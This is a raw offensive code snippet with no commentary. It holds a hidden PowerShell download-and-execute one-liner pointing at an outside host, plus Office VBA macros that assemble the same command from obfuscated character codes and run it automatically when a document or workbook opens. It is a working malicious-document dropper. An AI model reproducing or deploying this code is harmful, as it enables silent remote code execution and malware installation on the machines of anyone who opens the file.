aws stageless ssl

powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://memww.5gbfree.com/be.txt'))"

Sub AutoOpen()
    Dim first As String
    Dim second As String
    Dim third As String
    Dim fourth As String
    Dim fifth As String
    Dim sixth As String
    Dim seventh As String
    Dim eighth As String
    Dim ninth As String
    Dim tenth As String
    Dim eleventh As String
    Dim twelfth As String
    Dim last As String
    first = ChrW(112) & ChrW(111) & ChrW(119) & ChrW(101) & ChrW(114) & ChrW(115) & ChrW(104) & ChrW(101) & ChrW(108) & ChrW(108)
    second = ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101) & ChrW(32) & ChrW(45) & ChrW(119) & ChrW(32) & ChrW(104) & ChrW(105)
    third = ChrW(100) & ChrW(100) & ChrW(101) & ChrW(110) & ChrW(32) & ChrW(45) & ChrW(110) & ChrW(111) & ChrW(112) & ChrW(32)
    fourth = ChrW(45) & ChrW(101) & ChrW(112) & ChrW(32) & ChrW(98) & ChrW(121) & ChrW(112) & ChrW(97) & ChrW(115) & ChrW(115)
    fifth = ChrW(32) & ChrW(45) & ChrW(99) & ChrW(32) & ChrW(34) & ChrW(73) & ChrW(69) & ChrW(88) & ChrW(32) & ChrW(40)
    sixth = ChrW(40) & ChrW(110) & ChrW(101) & ChrW(119) & ChrW(45) & ChrW(111) & ChrW(98) & ChrW(106) & ChrW(101) & ChrW(99)
    seventh = ChrW(116) & ChrW(32) & ChrW(110) & ChrW(101) & ChrW(116) & ChrW(46) & ChrW(119) & ChrW(101) & ChrW(98) & ChrW(99)
    eighth = ChrW(108) & ChrW(105) & ChrW(101) & ChrW(110) & ChrW(116) & ChrW(41) & ChrW(46) & ChrW(100) & ChrW(111) & ChrW(119)
    ninth = ChrW(110) & ChrW(108) & ChrW(111) & ChrW(97) & ChrW(100) & ChrW(115) & ChrW(116) & ChrW(114) & ChrW(105) & ChrW(110)
    tenth = ChrW(103) & ChrW(40) & ChrW(39) & ChrW(104) & ChrW(116) & ChrW(116) & ChrW(112) & ChrW(58) & ChrW(47) & ChrW(47)
    eleventh = ChrW(109) & ChrW(101) & ChrW(109) & ChrW(119) & ChrW(119) & ChrW(46) & ChrW(53) & ChrW(103) & ChrW(98) & ChrW(102)
    twelfth = ChrW(114) & ChrW(101) & ChrW(101) & ChrW(46) & ChrW(99) & ChrW(111) & ChrW(109) & ChrW(47) & ChrW(98) & ChrW(101) & ChrW(46) & ChrW(116) & ChrW(120) & ChrW(116) & ChrW(39) & ChrW(41) & ChrW(41) & ChrW(34)
    last = first + second + third + fourth + fifth + sixth + seventh + eighth + ninth + tenth + eleventh + twelfth
    Shell(last)
End Sub




Sub Auto_Open()
    Dim first As String
    Dim second As String
    Dim third As String
    Dim fourth As String
    Dim fifth As String
    Dim sixth As String
    Dim seventh As String
    Dim eighth As String
    Dim ninth As String
    Dim tenth As String
    Dim eleventh As String
    Dim twelfth As String
    Dim last As String
    first = ChrW(112) & ChrW(111) & ChrW(119) & ChrW(101) & ChrW(114) & ChrW(115) & ChrW(104) & ChrW(101) & ChrW(108) & ChrW(108)
    second = ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101) & ChrW(32) & ChrW(45) & ChrW(119) & ChrW(32) & ChrW(104) & ChrW(105)
    third = ChrW(100) & ChrW(100) & ChrW(101) & ChrW(110) & ChrW(32) & ChrW(45) & ChrW(110) & ChrW(111) & ChrW(112) & ChrW(32)
    fourth = ChrW(45) & ChrW(101) & ChrW(112) & ChrW(32) & ChrW(98) & ChrW(121) & ChrW(112) & ChrW(97) & ChrW(115) & ChrW(115)
    fifth = ChrW(32) & ChrW(45) & ChrW(99) & ChrW(32) & ChrW(34) & ChrW(73) & ChrW(69) & ChrW(88) & ChrW(32) & ChrW(40)
    sixth = ChrW(40) & ChrW(110) & ChrW(101) & ChrW(119) & ChrW(45) & ChrW(111) & ChrW(98) & ChrW(106) & ChrW(101) & ChrW(99)
    seventh = ChrW(116) & ChrW(32) & ChrW(110) & ChrW(101) & ChrW(116) & ChrW(46) & ChrW(119) & ChrW(101) & ChrW(98) & ChrW(99)
    eighth = ChrW(108) & ChrW(105) & ChrW(101) & ChrW(110) & ChrW(116) & ChrW(41) & ChrW(46) & ChrW(100) & ChrW(111) & ChrW(119)
    ninth = ChrW(110) & ChrW(108) & ChrW(111) & ChrW(97) & ChrW(100) & ChrW(115) & ChrW(116) & ChrW(114) & ChrW(105) & ChrW(110)
    tenth = ChrW(103) & ChrW(40) & ChrW(39) & ChrW(104) & ChrW(116) & ChrW(116) & ChrW(112) & ChrW(58) & ChrW(47) & ChrW(47)
    eleventh = ChrW(109) & ChrW(101) & ChrW(109) & ChrW(119) & ChrW(119) & ChrW(46) & ChrW(53) & ChrW(103) & ChrW(98) & ChrW(102)
    twelfth = ChrW(114) & ChrW(101) & ChrW(101) & ChrW(46) & ChrW(99) & ChrW(111) & ChrW(109) & ChrW(47) & ChrW(112) & ChrW(97) & ChrW(46) & ChrW(116) & ChrW(120) & ChrW(116) & ChrW(39) & ChrW(41) & ChrW(41) & ChrW(34)
    last = first + second + third + fourth + fifth + sixth + seventh + eighth + ninth + tenth + eleventh + twelfth
    Shell(last)
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub

